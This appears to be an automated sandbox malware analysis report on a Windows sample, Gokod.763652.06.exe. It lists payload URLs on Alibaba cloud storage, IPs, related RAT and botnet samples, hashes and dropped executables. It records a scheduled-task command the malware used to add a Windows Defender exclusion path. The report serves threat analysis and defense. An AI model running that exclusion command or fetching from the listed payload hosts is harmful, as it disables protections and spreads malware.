                                                        https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgbuJ8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://nm25.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1002EJ8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://nm25.oss-cn-hangzhou.aliyuncs.com/J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735D4000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg?J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000002.00000003.1384651314.000002336DE32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ocsp.sectigo.com0Gokod.763652.06.exe, J8daaU.exe.0.drfalse
                                                            high
                                                            https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://xh4ffp.oss-cn-beijing.aliyuncs.com/7-2476756634-1002Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUGokod.763652.06.exefalse
                                                                  high
                                                                  https://nm25.oss-cn-hangzhou.aliyuncs.com/.oJ8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.sciencedirect.com/science/journal/01403664)/S/URIGokod.763652.06.exefalse
                                                                    high
                                                                    https://nm25.oss-cn-hangzhou.aliyuncs.com/2J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Gokod.763652.06.exefalse
                                                                      high
                                                                      https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://nm25.oss-cn-hangzhou.aliyuncs.com/omJ8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000002.00000002.1395559421.000002336DE2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://downloads.hawe.com/3/7/D3726-de.pdf)Gokod.763652.06.exefalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://g.live.com/odclientsettings/ProdV2edb.log.1.dr, qmgr.db.1.drfalse
                                                                            high
                                                                            http://crl.thawte.com/ThawteTimestampingCA.crl0aceprocted.sys.0.drfalse
                                                                              high
                                                                              https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgesJ8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://nm25.oss-cn-hangzhou.aliyuncs.com/7J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://nm25.oss-cn-hangzhou.aliyuncs.com/foJ8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://dl.google.com/release2/chrome/il4ofyksvfhyikxnl76bap4pmu_116.0.5845.111/116.0.5845.111_chromGokod.763652.06.exefalse
                                                                                high
                                                                                https://downloads.hawe.com/7/7/D7710MV-de.pdf)Gokod.763652.06.exefalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://nm25.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/WindowsJ8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000002.00000002.1395559421.000002336DE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1378896420.000002336DE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395695861.000002336DE68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://nm25.oss-cn-hangzhou.aliyuncs.com/WindowsJ8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgu.aliyuncs.com/J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://crossref.org/crossmark/1.0/Gokod.763652.06.exefalse
                                                                                      high
                                                                                      https://nm25.oss-cn-hangzhou.aliyuncs.com/.a(J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://sectigo.com/CPS0Gokod.763652.06.exe, J8daaU.exe.0.drfalse
                                                                                        high
                                                                                        https://nm25.oss-cn-hangzhou.aliyuncs.com/eJ8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000002.00000002.1395720938.000002336DE81000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://ocsp.thawte.com0aceprocted.sys.0.drfalse
                                                                                            high
                                                                                            https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000002.00000002.1395585730.000002336DE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000002.00000003.1380560951.000002336DE4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#Gokod.763652.06.exefalse
                                                                                                  high
                                                                                                  https://xh4ffp.oss-cn-beijing.aliyuncs.com/Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000002.00000002.1395600339.000002336DE44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://upx.sf.netGokod.763652.06.exe, Amcache.hve.54.drfalse
                                                                                                      high
                                                                                                      https://nm25.oss-cn-hangzhou.aliyuncs.com/vJ8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://nm25.oss-cn-hangzhou.aliyuncs.com/alJ8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://xh4ffp.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-1002Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpgJ8daaU.exe, 00000037.00000002.2413857794.000000EAE26FE000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735D4000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26F6000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://www.elsevier.com/locate/comcom)/S/URIGokod.763652.06.exefalse
                                                                                                          high
                                                                                                          https://nm25.oss-cn-hangzhou.aliyuncs.com/f.datjpgW_J8daaU.exe, 00000037.00000002.2414695513.000002B8735E9000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B8735E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://downloads.hawe.com/5/4/B5488-de.pdf)Gokod.763652.06.exefalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tGokod.763652.06.exe, J8daaU.exe.0.drfalse
                                                                                                            high
                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs
                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            118.178.60.98
                                                                                                            sc-2pyl.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                                                                                            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                            39.103.20.59
                                                                                                            sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                                                                                            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                            IP
                                                                                                            127.0.0.1
                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                            Analysis ID:1639725
                                                                                                            Start date and time:2025-03-16 05:19:17 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 8m 44s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Number of analysed new started processes analysed:56
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:Gokod.763652.06.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.evad.winEXE@84/35@2/3
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            HCA Information:Failed
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Exclude process from analysis (whitelisted): SIHClient.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.189.173.21, 172.202.163.200, 20.190.159.4
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                            TimeTypeDescription
                                                                                                            00:20:14API Interceptor4x Sleep call for process: Gokod.763652.06.exe modified
                                                                                                            00:20:18API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                            00:21:26API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                            00:21:40API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                            00:22:11API Interceptor2x Sleep call for process: J8daaU.exe modified
                                                                                                            04:20:50Task SchedulerRun new task: 04akq path: C:\Users\user\Documents\J8daaU.exe
                                                                                                            04:21:13Task SchedulerRun new task: Task1 path: cmd.exe s>/c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            118.178.60.98287263487-92873475.04.exeGet hashmaliciousUnknownBrowse
                                                                                                              176320045-328764975.06.exeGet hashmaliciousUnknownBrowse
                                                                                                                39.103.20.5945631.exeGet hashmaliciousNitolBrowse
                                                                                                                  45631.exeGet hashmaliciousUnknownBrowse
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com45631.exeGet hashmaliciousNitolBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    45631.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    sc-2pyl.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com287263487-92873475.04.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 118.178.60.98
                                                                                                                    176320045-328764975.06.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 118.178.60.98
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdKKveTTgaAAsecNNaaaa.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 116.62.234.155
                                                                                                                    KKveTTgaAAsecNNaaaa.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 8.158.99.172
                                                                                                                    KKveTTgaAAsecNNaaaa.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 47.112.66.80
                                                                                                                    KKveTTgaAAsecNNaaaa.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 39.101.25.51
                                                                                                                    KKveTTgaAAsecNNaaaa.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 139.252.196.48
                                                                                                                    KKveTTgaAAsecNNaaaa.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 121.43.15.175
                                                                                                                    KKveTTgaAAsecNNaaaa.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 139.243.169.18
                                                                                                                    KKveTTgaAAsecNNaaaa.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 101.133.181.30
                                                                                                                    ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 8.138.223.37
                                                                                                                    m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 8.182.118.98
                                                                                                                    CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdKKveTTgaAAsecNNaaaa.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 116.62.234.155
                                                                                                                    KKveTTgaAAsecNNaaaa.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 8.158.99.172
                                                                                                                    KKveTTgaAAsecNNaaaa.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 47.112.66.80
                                                                                                                    KKveTTgaAAsecNNaaaa.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 39.101.25.51
                                                                                                                    KKveTTgaAAsecNNaaaa.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 139.252.196.48
                                                                                                                    KKveTTgaAAsecNNaaaa.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 121.43.15.175
                                                                                                                    KKveTTgaAAsecNNaaaa.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 139.243.169.18
                                                                                                                    KKveTTgaAAsecNNaaaa.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 101.133.181.30
                                                                                                                    ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 8.138.223.37
                                                                                                                    m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 8.182.118.98
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Trojan.Win64.Agent.30981.30321.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    • 118.178.60.98
                                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.25337.28224.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    • 118.178.60.98
                                                                                                                    SecuriteInfo.com.Win32.RATX-gen.20425.5895.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    • 118.178.60.98
                                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.10149.19935.exeGet hashmaliciousPoverty StealerBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    • 118.178.60.98
                                                                                                                    SecuriteInfo.com.Variant.Lazy.637385.16625.13964.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    • 118.178.60.98
                                                                                                                    SecuriteInfo.com.Trojan.Win64.Agent.30981.30321.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    • 118.178.60.98
                                                                                                                    SecuriteInfo.com.Win32.RATX-gen.28955.11907.exeGet hashmaliciousXWormBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    • 118.178.60.98
                                                                                                                    SecuriteInfo.com.Win32.RATX-gen.23694.15705.exeGet hashmaliciousXWormBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    • 118.178.60.98
                                                                                                                    SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    • 118.178.60.98
                                                                                                                    SecuriteInfo.com.Win32.RATX-gen.3254.10881.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                    • 39.103.20.59
                                                                                                                    • 118.178.60.98
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    C:\Program Files (x86)\u0syUl\u0syUl.exe287263487-92873475.04.exeGet hashmaliciousUnknownBrowse
                                                                                                                      1237458-28376475.12.exeGet hashmaliciousGhostRatBrowse
                                                                                                                        1726386475-238475987.12.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                                                                          176348758-8376475954.05.exeGet hashmaliciousGhostRatBrowse
                                                                                                                            2683487-23874698385.8.exeGet hashmaliciousUnknownBrowse
                                                                                                                              23749-28764875432.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                16526348-28746873649.6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  26532748-873258734.03.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    C:\Program Files (x86)\4xCNoe\4xCNoe.exe287263487-92873475.04.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      1237458-28376475.12.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                        1726386475-238475987.12.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                                                                                          176348758-8376475954.05.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                            2683487-23874698385.8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              23749-28764875432.5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                16526348-28746873649.6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  26532748-873258734.03.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    Process:C:\Users\user\Documents\J8daaU.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):149320
                                                                                                                                                    Entropy (8bit):6.132902701299525
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:VafgcZGuY2TqWLGzwRC7kll1xtBQDTCCvtzaYPFPR/M:Yz8upLGaPQDnFzaYPFdM
                                                                                                                                                    MD5:5251B98614ACFFE5C856F4039CA03DA3
                                                                                                                                                    SHA1:C80ED6716E89D4862F28EBBC130EC5AA362DB963
                                                                                                                                                    SHA-256:6D6BA2BC9AD414837826F7278BC3E0116F1AEDA02D0C2284ED65819F5D9180A8
                                                                                                                                                    SHA-512:D750C9ADB08D9525EE9948C0C18C96F0C9520068AA4AA24885AC0D98790A6CC0A8CE0E71E1C669ACD4623E0AABFC08C11C02BE403F275B01AA4277C4DDAB3302
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                    • Filename: 287263487-92873475.04.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 1237458-28376475.12.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 1726386475-238475987.12.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 176348758-8376475954.05.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 2683487-23874698385.8.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 23749-28764875432.5.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 16526348-28746873649.6.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 26532748-873258734.03.exe, Detection: malicious, Browse
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Wy..Wy..Wy......]y.......y......Cy......qy......Ey......Cy......Sy......Ty..Wy...y......Uy......Vy..Wy`.Vy......Vy..RichWy..................PE..L.....Ef...............'.....N....................@..........................P............@..................................=..P....p..................H=...@.......1..p............................0..@...............8............................text............................... ..`.rdata..Hd.......f..................@..@.data...T....P......................@....rsrc........p.......8..............@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Documents\J8daaU.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):149320
                                                                                                                                                    Entropy (8bit):6.132902701299525
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:VafgcZGuY2TqWLGzwRC7kll1xtBQDTCCvtzaYPFPR/M:Yz8upLGaPQDnFzaYPFdM
                                                                                                                                                    MD5:5251B98614ACFFE5C856F4039CA03DA3
                                                                                                                                                    SHA1:C80ED6716E89D4862F28EBBC130EC5AA362DB963
                                                                                                                                                    SHA-256:6D6BA2BC9AD414837826F7278BC3E0116F1AEDA02D0C2284ED65819F5D9180A8
                                                                                                                                                    SHA-512:D750C9ADB08D9525EE9948C0C18C96F0C9520068AA4AA24885AC0D98790A6CC0A8CE0E71E1C669ACD4623E0AABFC08C11C02BE403F275B01AA4277C4DDAB3302
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                    • Filename: 287263487-92873475.04.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 1237458-28376475.12.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 1726386475-238475987.12.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 176348758-8376475954.05.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 2683487-23874698385.8.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 23749-28764875432.5.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 16526348-28746873649.6.exe, Detection: malicious, Browse
                                                                                                                                                    • Filename: 26532748-873258734.03.exe, Detection: malicious, Browse
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Wy..Wy..Wy......]y.......y......Cy......qy......Ey......Cy......Sy......Ty..Wy...y......Uy......Vy..Wy`.Vy......Vy..RichWy..................PE..L.....Ef...............'.....N....................@..........................P............@..................................=..P....p..................H=...@.......1..p............................0..@...............8............................text............................... ..`.rdata..Hd.......f..................@..@.data...T....P......................@....rsrc........p.......8..............@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                    Entropy (8bit):1.307357171321343
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrZ:KooCEYhgYEL0In
                                                                                                                                                    MD5:E2BCAD2B15410ECB99741ED9D82B60DF
                                                                                                                                                    SHA1:594A7E3C35662F834DFCFCECE8CF042B9F91DBFF
                                                                                                                                                    SHA-256:A6E75FB543B162EF2928186172F607CE38619344F214F2A60670C5AAD08BEB56
                                                                                                                                                    SHA-512:7CFE840F74E1B1D931D56E5D10480694A7AD33294A777427AF8342B5BE0C22A070C3FF08AC0BDD0608178AD4EEFD8BB365D510CF09BD5A92745B44A69098566E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x524303ef, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                    Entropy (8bit):0.42215769331122854
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:Qn2SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1w:Baza/vMUM2Uvz7DO
                                                                                                                                                    MD5:9EF5D266F59AEFC9D6DFAF71DD49C3D4
                                                                                                                                                    SHA1:E84C0138A17A95564BACF713370E9EB888596134
